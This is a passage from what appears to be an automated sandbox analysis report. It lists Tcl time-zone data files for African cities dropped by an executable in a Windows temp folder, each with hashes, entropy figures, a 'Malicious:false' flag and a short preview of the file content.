                                                                                                                                                                                                                                                    SHA-256:A4E0E775206EDBA439A454649A7AC94AE3AFEADC8717CBD47FD7B8AC41ADB06F
                                                                                                                                                                                                                                                    SHA-512:D82FF9C46C8845A6F15DC96AF8D98866C601EF0B4F7F5F0260AD571DD46931E90443FFEB5910D5805C5A43F6CC8866116066565646AE2C96E1D260999D1641F0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Douala

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.800219030063992
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcnKe2DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2Dml2D4v
                                                                                                                                                                                                                                                    MD5:18C0C9E9D5154E20CC9301D5012066B9
                                                                                                                                                                                                                                                    SHA1:8395E917261467EC5C27034C980EDD05F2242F40
                                                                                                                                                                                                                                                    SHA-256:0595C402B8499FC1B67C196BEE24BCA4DE14D3E10B8DBBD2840D2B4C88D9DF28
                                                                                                                                                                                                                                                    SHA-512:C53540E25B76DF8EC3E2A5F27B473F1D6615BFBD043E133867F3391B057D8552350F912DF55DD11C1357765EF76D8E286BBBE839F28295D09751243DC0201BDF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Douala) $TZData(:Africa/Lagos).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\El_Aaiun

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5885
                                                                                                                                                                                                                                                    Entropy (8bit):3.727945999721289
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:P1OZIlkCx4aWvYzCcgwUjdnPb9gNIBhZtwIuZN38BFvxt3V8byvSl3byEHP:P0ZtYzCcgwUjdPBhZuY1xP8P
                                                                                                                                                                                                                                                    MD5:822B00C8FF53B7E5F1B1A7A06B34FEF2
                                                                                                                                                                                                                                                    SHA1:78DBB1F1BD9A59EC331335DCB6B5978E9C5B4D0F
                                                                                                                                                                                                                                                    SHA-256:776BFD12EF9A6B65171DB3D2A5F6F13FB4E2286DB5DCEF33D0DCEBFA1259B605
                                                                                                                                                                                                                                                    SHA-512:32FAA47B029BEAD1EDB949F0C6D9CAEA5856AFBF5B80A45944876C03EB238605C72FF96364D7BFAD781BCA618BE39A2758FEB059AFFBE60D97C4E62B19A13F7C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/El_Aaiun) {. {-9223372036854775808 -3168 0 LMT}. {-1136070432 -3600 0 WAT}. {198291600 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {1212278400 3600 1 WEST}. {1220223600 0 0 WET}. {1243814400 3600 1 WEST}. {1250809200 0 0 WET}. {1272758400 3600 1 WEST}. {1281222000 0 0 WET}. {1301788800 3600 1 WEST}. {1312066800 0 0 WET}. {1335664800 3600 1 WEST}. {1342749600 0 0 WET}. {1345428000 3600 1 WEST}. {1348970400 0 0 WET}. {1367114400 3600 1 WEST}. {1373162400 0 0 WET}. {1376100000 3600 1 WEST}. {1382839200 0 0 WET}. {1396144800 3600 1 WEST}. {1403920800 0 0 WET}. {1406944800 3600 1 WEST}. {1414288800 0 0 WET}. {1427594400 3600 1 WEST}. {1434247200 0 0 WET}. {1437271200 3600 1 WEST}. {1445738400 0 0 WET}. {1459044000 3600 1 WEST

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Freetown

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.817633094200984
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2Dcu5sp4DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2Dk4DBP
                                                                                                                                                                                                                                                    MD5:035B36DF91F67179C8696158F58D0CE8
                                                                                                                                                                                                                                                    SHA1:E43BFF33090324110048AC19CBA16C4ED8D8B3FE
                                                                                                                                                                                                                                                    SHA-256:3101942D9F3B2E852C1D1EA7ED85826AB9EA0F8953B9A0E6BAC32818A2EC9EDD
                                                                                                                                                                                                                                                    SHA-512:A7B52154C6085E5D234D6D658BA48D2C8EC093A429C3907BE7D16654F6EE9EBE8E3100187650956E5164B18340AB0C0979C1F4FA90EFE0CC423FBA5F14F45215
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Gaborone

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.8512443534123255
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcHK0o/4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DAV+4G
                                                                                                                                                                                                                                                    MD5:BA2C7443CFCB3E29DB84FEC16B3B3843
                                                                                                                                                                                                                                                    SHA1:2BA7D68C48A79000B1C27588A20A751AA04C5779
                                                                                                                                                                                                                                                    SHA-256:28C1453496C2604AA5C42A88A060157BDFE22F28EDD1FBC7CC63B02324ED8445
                                                                                                                                                                                                                                                    SHA-512:B275ABAADA7352D303EFEAD66D897BE3099A33B80EA849F9F1D98D522AA9A3DC44E1D979C0ABF2D7886BACF2F86D25837C971ECE6B2AF731BE2EE0363939CBDE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Harare

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.835896095919456
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62Dc0B5h4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62Dlfh4G
                                                                                                                                                                                                                                                    MD5:59137CFDB8E4B48599FB417E0D8A4A70
                                                                                                                                                                                                                                                    SHA1:F13F9932C0445911E395377FB51B859E4F72862A
                                                                                                                                                                                                                                                    SHA-256:E633C6B619782DA7C21D548E06E6C46A845033936346506EA0F2D4CCCDA46028
                                                                                                                                                                                                                                                    SHA-512:2DCEB9A9FA59512ADCDE4946F055718A8C8236A912F6D521087FC348D52FFF462B5712633FDA5505876C500F5FD472381B3AC90CF1AEDF0C96EA08E0A0D3B7BA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Harare) $TZData(:Africa/Maputo).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Johannesburg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):298
                                                                                                                                                                                                                                                    Entropy (8bit):4.638948195674004
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52DWbAm2OHePP1mXs0//HF20706VcF206KsF:MBp52DWkmdHePP1mcUvFxJVcFEKsF
                                                                                                                                                                                                                                                    MD5:256740512DCB35B4743D05CC24C636DB
                                                                                                                                                                                                                                                    SHA1:1FD418712B3D7191549BC0808CF180A682AF7FC1
                                                                                                                                                                                                                                                    SHA-256:768E9B2D9BE96295C35120414522FA6DD3EDA4500FE86B6D398AD452CAF6FA4B
                                                                                                                                                                                                                                                    SHA-512:DCFF6C02D1328297BE24E0A640F5823BFD23BDE67047671AC18EB0B1F450C717E273B27A48857F54A18D6877AB8132AAED94B2D87D2F962DA43FE473FC3DDC94
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Johannesburg) {. {-9223372036854775808 6720 0 LMT}. {-2458173120 5400 0 SAST}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {-829526400 10800 1 SAST}. {-813805200 7200 0 SAST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Juba

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.884521503398915
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsIXR8HVAIgNGEkXR8o2DcdHl0DcIXR8u:SlSWB9IZaM3y7IXR8HVAIgNTkXR8o2D9
                                                                                                                                                                                                                                                    MD5:F0333A1DE72E7E3C8A13A7A4D9F2CCC7
                                                                                                                                                                                                                                                    SHA1:8D1259C2C4EE33790F88D392904D9DCDCE60A633
                                                                                                                                                                                                                                                    SHA-256:D5BA3C8C36E88E80EFA603B5BCEEADBFFFDDC87D47F47D2F15D62708E8346443
                                                                                                                                                                                                                                                    SHA-512:B4E3CE0BD12E629707A9FD338C4B36FBC74022404A8FC7BD16068571FBE61F2E87AD797737739E7E9C34D3A4604EC9AD8FCAA0836C0AA7AA14DC13523BFF93DF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Khartoum)]} {. LoadTimeZoneFile Africa/Khartoum.}.set TZData(:Africa/Juba) $TZData(:Africa/Khartoum).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Kampala

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.787605387034664
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcJEl2DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DIEl2Dkr
                                                                                                                                                                                                                                                    MD5:8CF1CA04CD5FC03D3D96DC49E98D42D4
                                                                                                                                                                                                                                                    SHA1:4D326475E9216089C872D5716C54DEB94590FCDE
                                                                                                                                                                                                                                                    SHA-256:A166E17E3A4AB7C5B2425A17F905484EBFDBA971F88A221155BCA1EC5D28EA96
                                                                                                                                                                                                                                                    SHA-512:1301B9469ED396198A2B87CBA254C66B148036C0117D7D4A8286CB8729296AD735DF16581AEF0715CEE24213E91970F181824F3A64BCF91435FDAD85DCD78C84
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Khartoum

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                    Entropy (8bit):3.967955792980027
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQWe9hXn0Vb0iluy8pLXeKXhCvN9U0TlW50qCPR8jYJRFp0Q8SdAri/8+u8Wb2:5vn010ilux1XeKXhCvN9U0TMGqCp8jYH
                                                                                                                                                                                                                                                    MD5:58D2DAB313AF844E330560A3ECFCB150
                                                                                                                                                                                                                                                    SHA1:2ACBE3F6BFE4A0435BF7B1BE1D1AFEC74F1B61BB
                                                                                                                                                                                                                                                    SHA-256:4AE7C0262505994EFD358165D8A3D896ED3D7766EB2F2EC0029E54CC27663A11
                                                                                                                                                                                                                                                    SHA-512:35CF9D2D1B13C21BD672A1960F2A77A3FD7F52DA208990D4D10891A4FD87CE90E946A5FF1383FB11F0B3675C335B1EAD5B4F1913AB1302ED550CE94D1B21E7A2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Khartoum) {. {-9223372036854775808 7808 0 LMT}. {-1230775808 7200 0 CAT}. {10360800 10800 1 CAST}. {24786000 7200 0 CAT}. {41810400 10800 1 CAST}. {56322000 7200 0 CAT}. {73432800 10800 1 CAST}. {87944400 7200 0 CAT}. {104882400 10800 1 CAST}. {119480400 7200 0 CAT}. {136332000 10800 1 CAST}. {151016400 7200 0 CAT}. {167781600 10800 1 CAST}. {182552400 7200 0 CAT}. {199231200 10800 1 CAST}. {214174800 7200 0 CAT}. {230680800 10800 1 CAST}. {245710800 7200 0 CAT}. {262735200 10800 1 CAST}. {277246800 7200 0 CAT}. {294184800 10800 1 CAST}. {308782800 7200 0 CAT}. {325634400 10800 1 CAST}. {340405200 7200 0 CAT}. {357084000 10800 1 CAST}. {371941200 7200 0 CAT}. {388533600 10800 1 CAST}. {403477200 7200 0 CAT}. {419983200 10800 1 CAST}. {435013200 7200 0 CAT}. {452037600 10800 1 CAST}. {466635600 7200 0 CAT}. {483487200 10800 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Kigali

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.8623059127375585
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcCJRx+DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DRX+Da
                                                                                                                                                                                                                                                    MD5:32AE0D7A7E7F0DF7AD0054E959A53B09
                                                                                                                                                                                                                                                    SHA1:AE455C96401EBB1B2BDE5674A71A182D9E12D7BD
                                                                                                                                                                                                                                                    SHA-256:7273FA039D250CABAE2ACCE926AB483B0BF16B0D77B9C2A7B499B9BDFB9E1CBB
                                                                                                                                                                                                                                                    SHA-512:DC8E89A75D7212D398A253E6FF3D10AF72B7E14CBC07CA53C6CB01C8CE40FB12375E50AD4291C973C872566F8D875D1E1A2CF0A38F02C91355B957095004563E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Kigali) $TZData(:Africa/Maputo).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Kinshasa

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.816805447465336
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcqQFeDcGev:SlSWB9IZaM3y7V4FVAIgNT9L2DdD4v
                                                                                                                                                                                                                                                    MD5:90EC372D6C8677249C8C2841432F0FB7
                                                                                                                                                                                                                                                    SHA1:5D5E549496962420F56897BC01887B09EC863D78
                                                                                                                                                                                                                                                    SHA-256:56F7CA006294049FA92704EDEAD78669C1E9EABE007C41F722E972BE2FD58A37
                                                                                                                                                                                                                                                    SHA-512:93FD7C8F5C6527DCCFBF21043AB5EED21862A22DA1FDB3ED7635723060C9252D76541DAD3A76EBF8C581A82A6DBEF2766DD428ACE3A9D6A45954A787B686B1CA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Lagos

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):141
                                                                                                                                                                                                                                                    Entropy (8bit):4.965079502032549
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52DcGemFFkXGm2OHWTdvUQDWTFWZRYvCn:SlSWB9X52D4mFJm2OHWTdRDWTGRLn
                                                                                                                                                                                                                                                    MD5:51D7AC832AE95CFDE6098FFA6FA2B1C7
                                                                                                                                                                                                                                                    SHA1:9DA61FDA03B4EFDA7ACC3F83E8AB9495706CCEF1
                                                                                                                                                                                                                                                    SHA-256:EEDA5B96968552C12B916B39217005BF773A99CA17996893BC87BCC09966B954
                                                                                                                                                                                                                                                    SHA-512:128C8D3A0AA7CF4DFAE326253F236058115028474BF122F14AB9461D910A03252FEEB420014CA91ACFBF94DF05FBFCADE98217FC59A86A2581BB68CDC83E88C8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Lagos) {. {-9223372036854775808 816 0 LMT}. {-1588464816 3600 0 WAT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Libreville

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.816649832558406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2Dcr7bp4DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2Dgfp4Di
                                                                                                                                                                                                                                                    MD5:D1387B464CFCFE6CB2E10BA82D4EEE0E
                                                                                                                                                                                                                                                    SHA1:F672B694551AB4228D4FC938D0CC2DA635EB8878
                                                                                                                                                                                                                                                    SHA-256:BEE63E4DF9D03D2F5E4100D0FCF4E6D555173083A4470540D4ADC848B788A2FC
                                                                                                                                                                                                                                                    SHA-512:DEB95AAB852772253B60F83DA9CE5E24144386DFBFB1F1E9A77905511181EC84FD13B00200602D6C276820527206EE0078DDE81CC0F1B1276B8BF4360C2CDB1E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Libreville) $TZData(:Africa/Lagos).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Lome

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.813464796454866
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2Dcih4DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2DNh4DB
                                                                                                                                                                                                                                                    MD5:D2AA823E78DD8E0A0C83508B6378DE5D
                                                                                                                                                                                                                                                    SHA1:C26E03EF84C3C0B6001F0D4471907A94154E6850
                                                                                                                                                                                                                                                    SHA-256:345F3F9422981CC1591FBC1B5B17A96F2F00F0C191DF23582328D44158041CF0
                                                                                                                                                                                                                                                    SHA-512:908F8D096DA6A336703E7601D03477CECBCDC8D404C2410C7F419986379A14943BB61B0D92D87160D5F1EF5B229971B2B9D122D2B3F70746CED0D4D6B10D7412
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Lome) $TZData(:Africa/Abidjan).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Luanda

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.807298951345495
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DccLtBQDcGev:SlSWB9IZaM3y7V4FVAIgNT9L2DXQD4v
                                                                                                                                                                                                                                                    MD5:E851465BCA70F325B0B07E782D6A759E
                                                                                                                                                                                                                                                    SHA1:3B3E0F3FD7AF99F941A3C70A2A2564C9301C8CFB
                                                                                                                                                                                                                                                    SHA-256:F7E1DCBAE881B199F2E2BF18754E145DDED230518C691E7CB34DAE3C922A6063
                                                                                                                                                                                                                                                    SHA-512:5F655B45D7A16213CE911EDAD935C1FEE7A947C0F5157CE20712A00B2A12A34AE51D5C05A392D2FF3A0B2DA7787D6C614FF100DDE7788CA01AAE21F10DD1CC3A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Luanda) $TZData(:Africa/Lagos).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Lubumbashi

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.893308860167744
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcfpT0DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62D8pT0G
                                                                                                                                                                                                                                                    MD5:CD638B7929FB8C474293D5ECF1FE94D3
                                                                                                                                                                                                                                                    SHA1:149AD0F3CF8AC1795E84B97CFF5CEB1FD26449C4
                                                                                                                                                                                                                                                    SHA-256:41D32824F28AE235661EE0C959E0F555C44E3E78604D6D2809BBA2254FD47258
                                                                                                                                                                                                                                                    SHA-512:D762C49B13961A01526C0DD9D7A55E202448E1B46BA64F701FB2E0ABE0F44B2C3DF743864B9E62DC07FD6CEA7197945CE246C89CDACB1FEC0F924F3ECC46B170
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Lusaka

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.857012096036922
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcOf+DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DkDE/
                                                                                                                                                                                                                                                    MD5:3769866ADC24DA6F46996E43079C3545
                                                                                                                                                                                                                                                    SHA1:546FA9C76A1AE5C6763B31FC7214B8A2B18C3C52
                                                                                                                                                                                                                                                    SHA-256:5BAF390EA1CE95227F586423523377BABD141F0B5D4C31C6641E59C6E29FFAE0
                                                                                                                                                                                                                                                    SHA-512:DEA8CAB330F6321AD9444DB9FEC58E2CBCC79404B9E5539EABB52DBC9C3AC01BA1E8A3E1EC32906F02E4E4744271D84B626A5C32A8CD8B22210C42DD0E774A9C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
